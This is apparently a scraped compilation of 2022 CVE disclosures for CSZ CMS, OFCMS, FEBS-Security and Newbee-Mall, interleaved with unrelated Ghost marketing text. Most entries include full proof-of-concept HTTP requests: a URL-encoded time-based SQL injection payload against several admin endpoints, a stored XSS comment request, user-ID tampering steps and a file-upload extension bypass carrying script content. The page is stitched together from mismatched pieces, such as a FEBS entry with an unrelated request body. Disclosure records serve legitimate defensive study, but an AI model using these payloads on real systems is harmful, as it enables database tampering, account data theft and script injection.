An arbitrary file upload vulnerability in the file upload module of Ghost CMS v4.42.0 allows attackers to execute arbitrary code via a crafted file.

![The Browser](https://ghost.org/images/customers/thebrowser.jpg)

Turn your audience into a business

**Ghost gives creators tools to launch their own subscription business.**

Memberships, subscriptions, and email newsletters, all in one place. Some of the most popular editorial newsletters in the world run on Ghost, including The Browser, with its **10,000+** paying subscribers.

Ghost is a complete platform to run an independent media business, whether you're just getting started as a creator, or scaling to millions of dollars a year in recurring revenue.

Subscription business models have been incredibly successful in software, music and video streaming over the last few years. Now, anyone can launch their own subscription commerce service, and make a living from their creative work.

![The Browser logo](https://ghost.org/images/customers/thebrowser_logo_hub7f1f059f82ec3b2cd82ecfcbfc3dd82_16082_400x0_resize_q100_h2_box_3.webp)

![Buffer theme](https://ghost.org/images/customers/buffer.jpg)

Who uses Ghost?

**A powerful publishing platform, trusted by the world's leading writers, creators, and professional content teams.**

Ghost is used by teams who want full control of their content workflow, and are tired of fighting broken software. A clean editor, optimised publishing flow, native email newsletters, and total control of design are the biggest reasons for why teams trade in their old platform for Ghost.

Setting up a basic blog is easy, but if you're creating content for work, and you need a reliable platform to build a business around, Ghost is the leading choice for professional online publishing.

Many of the world's best content marketing teams, like **Buffer**, use Ghost to publish.

![Buffer logo](https://ghost.org/images/customers/buffer_logo_hu7bd072387c43f72fd2287d56486d6823_13632_400x0_resize_q100_h2_box_3.webp)

![OpenAI theme](https://ghost.org/images/customers/openai.jpg)

Why choose Ghost?

**Privacy, security and speed are some of the most common reasons for why large companies and publications favour Ghost for their publishing needs.**

We've found that most modern teams setting up new publications get given the same brief: Use an open platform which is stable, make sure it's fast + SEO friendly, and make absolutely certain it's not PHP. Ghost has quickly become the most popular platform to check all those boxes.

Enjoy a standard of technology which you normally only get building in-house: A **Node.js** core + a full **JSON API** with a permissive **MIT License**, all of which have received extensive independent security audits and penetration testing.

Ghost's advantages attracted Elon Musk's **OpenAI** team to publish all of their research using Ghost.

![OpenAI logo](https://ghost.org/images/customers/openai_logo_hu86d0967c44bea60c7f330757e8cdddef_3444_360x0_resize_q100_h2_box_3.webp)

![The Stanford Review theme](https://ghost.org/images/customers/stanfordreview.jpg)

But what about Medium?

**Medium is a great social network to use for promotion, while Ghost allows you to build out your own platform and your own audience.**

When you're building a publication you should always use social networks like Twitter, Facebook and Medium to promote your content & find new readers. But once you've got those readers: What next? Social networks give you zero control over your audience, and if they decide to change algorithms or disappear, then so does your readership.

**You can loosely think of it like this:** Social networks are like running ads or guest spot in somebody else's magazine. By contrast, using Ghost is like creating your own magazine and owning the full, custom experience from cover to cover.

Multiple people on **The Stanford Review** team publish on Medium, but the newspaper has smartly built out its core publication on top of Ghost.

![The Stanford Review logo](https://ghost.org/images/customers/stanfordreview_logo_huf4cbbc71030e6f3be049fc654f733540_10681_400x0_resize_q100_h2_box_3.webp)

![Mozilla](https://ghost.org/images/customers/mozilla.jpg)

What's the best way to run Ghost?

**Ghost can either be run on our fully managed hosting, or directly integrated into your own infrastructure depending on what you prefer.**

The majority of people tend to run Ghost on our fully managed PaaS called **Ghost(Pro)**. This removes the headaches of server management, security monitoring and software updates completely — and allows you to focus on the other aspects of your business where time is better spent.

Some larger organisations such as **Apple** and **Mozilla** choose to run Ghost on their own private networks where they're able to make some deep core modifications to the software in order suit specific use cases.

For these types of companies we're always pleased to offer **Enterprise Cloud** contracts to ensure that their software is always secure, up to date, and running optimally.

![Mozilla logo](https://ghost.org/images/customers/mozilla_logo_hu976b6a221e9fe502ecd0f498c1887503_23119_400x0_resize_q100_h2_box_3.webp)

![Speedtest theme](https://ghost.org/images/customers/speedtest.jpg)

Can I modify it for my needs?

**Ghost has a very simple admin UI for a smooth user experience, but under the hood you still have full control over how it works.**

Things like automatic **XML sitemaps**, **RSS feeds** and dedicated **SEO & Structure Data** meta fields mean that there's a lot which Ghost just does for you, right out of the proverbial box. But it can also be adapted to suit a huge number of use cases.

Front end modifications for things like analytics, styling and scripts are easily done at a theme level. You can plug in multiple database via an ORM layer, while your file system can live almost anywhere using a custom storage adapter. Even integrating a full search index using something like **Algolia** is possible with a few tweaks.

Our friends over at **Speedtest.net** even run a modified base URL setup to serve their site on `speedtest.net/insights` rather than `insights.speedtest.net`.

![Speedtest logo](https://ghost.org/images/customers/speedtest_logo_huafd33ecc61f058273c3105e415797f25_3481_400x0_resize_q100_h2_box_3.webp)

![Fullstory theme](https://ghost.org/images/customers/fullstory.jpg)

What about design?

**Create a custom design from scratch, choose a pre-made template, or modify our default theme to suit your style and brand.**

Our **theme API** gives you full control over the look and feel of your publication, with a strong focus on both flexibility and performance. You can build a theme completely from scratch, or you can select one of the many pre-made templates available in our **theme marketplace**.

A fast-track to getting a new publication online is to use the Ghost default theme as a base and modify it to suit your brand. This allows you to get up and running with minimal fuss, benefitting from hundreds of hours of development already done for you. If that's not for you, you can always start from ground zero and create a stunning custom publication like **FullStory** did.

Whatever you decide, you're in the driver's seat.

![Fullstory logo](https://ghost.org/images/customers/fullstory_logo_hu8354d8351eba2e106b2a62f478e12da2_1771_241x0_resize_q100_h2_box_3.webp)

**Ready to give it a try?** Start a trial completely free for 14 days and build your publication

CVE-2022-28397: Ghost Customers – A showcase of real sites built with Ghost

Csz Cms 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Members_viewUsers

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Members/viewUsers/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/member/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: 127_0_01_cszsess=bkmcrultec13pmpnos5mb208vtnbophc; cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=3f9bce14914ec5f9957c9737702e7d49;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23  
cszcms-1.2.2/cszcms/controllers/admin/Members.php::viewUsers  
![image](https://user-images.githubusercontent.com/101378989/157823627-d95048e4-311e-426d-bb4d-b26f5329160a.png)

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27161: SQL Injection vulnerability on cszcms_admin_Members_viewUsers · Issue #43 · cskaza/cszcms

CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Members_editUser

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Members/editUser/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/member/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: 127_0_01_cszsess=bkmcrultec13pmpnos5mb208vtnbophc; cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=d5df85a9d7e7227524a43e3f510a3ac1;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27162: SQL Injection vulnerability  on cszcms_admin_Members_editUser · Issue #44 · cskaza/cszcms

CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Users_editUser

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Users/editUser/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/member/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=ac52710dd12b2ae2241aaf6c83f68415; 127_0_01_cszsess=dt2ll8telivrlubjmmkh34ppo976eqea;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27163: SQL Injection vulnerability  on cszcms_admin_Users_editUser · Issue #45 · cskaza/cszcms

CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Users_viewUsers

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Users/viewUsers/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/member/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: 127_0_01_cszsess=dt2ll8telivrlubjmmkh34ppo976eqea; cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=e37ee84201b977b79a3b574b64a6a160;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27164: SQL Injection vulnerability  on cszcms_admin_Users_viewUsers · Issue #42 · cskaza/cszcms

CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Plugin_manager_setstatus

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Plugin_manager/setstatus/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/admin/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=e37ee84201b977b79a3b574b64a6a160; 127_0_01_cszsess=c3vlui957el8pk143j875684bjshnqbi;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27165: SQL Injection vulnerability  on cszcms_admin_Plugin_manager_setstatus · Issue #41 · cskaza/cszcms

A cross-site scripting (XSS) vulnerability at /ofcms/company-c-47 in OFCMS v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comment text box.

\[Suggested description\]  
Cross-site scripting vulnerability exists in the front page of OFCMS system. The user comment function in the foreground of the system does not escape the input parameters effectively. In addition, the comment function does not require login verification, which leads to a high risk of cross-site scripting vulnerability.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://gitee.com/oufu/ofcms

\[Affected Product Code Base\]  
v1.1.4

\[Affected Component\]

GET /ofcms/api/v1/comment/save.json?comment\_content=%E6%B5%8B%E8%AF%95%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E111&content\_id=47&site\_id=1&check\_status=1&\_=1647846678826 HTTP/1.1  
Host: localhost:7000  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:7000/ofcms/company-c-47.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: JSESSIONID=2F8C11250ADB9A9DA125C3A0F9B7C8BA  
Connection: close

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability to prove\]  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173209_bea2fadd_9017458.png "屏幕截图.png")  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173224_66a3382a_9017458.png "屏幕截图.png")  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173236_85998832_9017458.png "屏幕截图.png")

CVE-2022-27961: There is a stored xss vulnerability exists in ofcms · Issue #I4Z8QU · 欧福/ofcms - Gitee.com

Insecure permissions configured in the user_id parameter at SysUserController.java of OFCMS v1.1.4 allows attackers to access and arbitrarily modify users' personal information.

\[Suggested description\]  
Information leakage vulnerability exists in the ofCMS background. As the detail method in SysUserController does not securely limit the user\_id parameter passed, any background user can view the personal information of other users by modifying the value of user\_id.

![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173625_5acb7880_9017458.png "屏幕截图.png")

\[Vulnerability Type\]  
Information disclosure

\[Vendor of Product\]  
https://gitee.com/oufu/ofcms

\[Affected Product Code Base\]  
v1.1.4

\[Affected Component\]

POST /ofcms/admin/system/user/detail.json HTTP/1.1  
Host: localhost:7000  
Content-Length: 54  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:7000  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:7000/ofcms/admin/f.html?p=system/user/edit.html&topMode=readonly&user\_id=3  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: JSESSIONID=B07DD54FA7B0F4A0B6F042CBEFD725E0  
Connection: close

p=system%2Fuser%2Fedit.html&topMode=readonly&user\_id=1

\[Attack Type\]  
Remote

\[Vulnerability to prove\]  
1.Enter the system background, open the Burpsuite agent function, click "Basic Information"  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173657_5c32e5ce_9017458.png "屏幕截图.png")

2.To obtain captured packet data，change the value of user\_id to 1.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173716_2ec15598_9017458.png "屏幕截图.png")

3.Click send data package, popup user basic information window, but the current user's input has not been transmitted.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173737_b6f3da7e_9017458.png "屏幕截图.png")

4.To obtain captured packet data, change the value of user\_id to 1.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173803_847ecc61_9017458.png "屏幕截图.png")

5.The administrator successfully obtains the account information after sending the data packet.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0323/173832_abf99747_9017458.png "屏幕截图.png")

CVE-2022-27960: There is a Information disclosure vulnerability exists in ofcms · Issue #I4Z8SS · 欧福/ofcms - Gitee.com

Insecure permissions configured in the userid parameter at /user/getuserprofile of FEBS-Security v1.0 allows attackers to access and arbitrarily modify users' personal information.

**There is a security vulnerability exists in FEBS-Security.**

\[Suggested description\] The user / getuserprofile method in FEBS security project lacks the verification of userid, so that any user can modify the personal information of other users through the user / updateuserprofile method. via a Google search in url:http://localhost:8080/user/updateUserProfile

\[Vulnerability Type\] Insecure permissions

\[Vendor of Product\] https://github.com/febsteam/FEBS-Security

\[Affected Product Code Base\] v1.0

\[Affected Component\] //受影响的组件 POST /web\_info/save.json HTTP/1.1 Host: localhost:9105 Content-Length: 213 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" Accept: application/json, text/javascript, _/_; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost:9105 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:9105/web\_info/edit.action Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=955307B507B1FD2D9AE8E69C6EABFB75; navUrl=http://localhost:9105/admin/basic.action Connection: close

name=Javaex%E8%AE%BA%E5%9D%9B&domain=http%3A%2F%2Fwww.javaex.cn%2F&email=291026192%40qq.com&recordNumber=%E8%8B%8FICP%E5%A4%8718008530%E5%8F%B7&license=1&statisticalCode= your xss payload

\[Attack Type\] Remote

\[Proof of concept\]

1.There are security vulnerabilities in the personal information modification module of this project. It is known from the source code that the function of modifying personal information is to judge the user according to the incoming userid.

    @RequestMapping("user/getUserProfile")
    @ResponseBody
    public ResponseBo getUserProfile(Long userId) {
        try {
            MyUser user = new MyUser();
            user.setUserId(userId);
            return ResponseBo.ok(this.userService.findUserProfile(user));
        } catch (Exception e) {
            log.error("获取用户信息失败", e);
            return ResponseBo.error("获取用户信息失败，请联系网站管理员！");
        }
    }
    
    @RequestMapping("user/updateUserProfile")
    @ResponseBody
    public ResponseBo updateUserProfile(MyUser user) {
        try {
            this.userService.updateUserProfile(user);
            return ResponseBo.ok("更新个人信息成功！");
        } catch (Exception e) {
            log.error("更新用户信息失败", e);
            return ResponseBo.error("更新用户信息失败，请联系网站管理员！");
        }
    }
    

2.Use burpsuite to capture packets and modify userid

![image-20220215135415477](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135415477.png)

3.The userid of the currently logged in user is 171, and the modified userid is 172.Enter the modify personal information page.

![image-20220215135703895](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135703895.png)

4.After modifying any content, click save. Get packet capture data.

![image-20220215135841905](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135841905.png)

5.After saving successfully, exit the current login user, switch to the user with userid 172 just modified, and enter the page of viewing personal information.Vulnerability recurrence completed.

![image-20220215140035912](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215140035912.png)

CVE-2022-27958: CVE-Request/febs.md at main · afeng2016-s/CVE-Request

Newbee-Mall v1.0.0 was discovered to contain an arbitrary file upload via the Upload function at /admin/goods/edit.

\[Suggested description\]  
A file upload vulnerability exists in NewBee mall. Because the upload method of uploadcontroller can bypass the upload restriction by modifying the file format suffix.

\[Vulnerability Type\]  
File upload vulnerability

\[Vendor of Product\]  
https://github.com/newbee-ltd/newbee-mall

\[Affected Product Code Base\]  
v1.0.0

\[Affected Component\]  
POST /admin/upload/file HTTP/1.1  
Host: localhost:28089  
Content-Length: 671  
Cache-Control: max-age=0  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
sec-ch-ua-mobile: ?0  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost:28089/  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoXATzrr6JWhnTx5Q  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Dest: iframe  
Referer: http://localhost:28089/admin/goods/edit/10907  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: locale=zh-cn; Hm\_lvt\_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=11D044F12F07C3F2772AC7EE836610E2  
Connection: close

\------WebKitFormBoundaryoXATzrr6JWhnTx5Q  
Content-Disposition: form-data; name="file"; filename="1.html.png"  
Content-Type: image/png

<script type="text/javascript" src="http://www.qq.com/404/search\_children.js" charset="utf-8" homePageUrl="{{domain}}" homePageName="{{siteName}}"></script>

            <script>alert("xss")</script>
        </div>
    </div>
    

\------WebKitFormBoundaryoXATzrr6JWhnTx5Q--

\[Impact Code execution\]  
true

\[Vulnerability proof\]  
1.Access address http://localhost:28089/admin/goods , select a commodity information to modify and enter the file upload page.  
![image](https://user-images.githubusercontent.com/85676107/156484791-7cf3819d-08ae-4b5a-b6dd-c41ca09e25f1.png)  
2.Open burpsuite packet capturing agent and click to upload pictures.  
![image](https://user-images.githubusercontent.com/85676107/156484843-1ac1fefa-ee37-45dd-a800-bf6fd74d788d.png)  
3.By default, the system only supports JPG, PNG and GIF files. We can bypass them by modifying the file suffix.  
![image](https://user-images.githubusercontent.com/85676107/156484894-ec280ca5-9f84-4499-9763-e57fb297b504.png)  
4.Modify the value of filename to 1.html  
![image](https://user-images.githubusercontent.com/85676107/156484948-9d5736a9-5132-4f65-8a7b-e6f0b281c3e3.png)  
Get the access path to file upload  
![image](https://user-images.githubusercontent.com/85676107/156484999-7ae125b6-0f2c-4a1d-bb89-a0496dc26126.png)  
Complete data update  
![image](https://user-images.githubusercontent.com/85676107/156485043-07f12491-d25b-4c33-89fd-107211a2431c.png)  
5.Access the upload file path, and the vulnerability reproduction is completed.  
![image](https://user-images.githubusercontent.com/85676107/156485114-79f128cd-a0fb-4d86-8e48-5b101d3c24b8.png)

\[Defective code\]  
![image](https://user-images.githubusercontent.com/85676107/156485179-496031ed-1ff4-4d46-bd95-c8c839fde36a.png)

Tag

#apple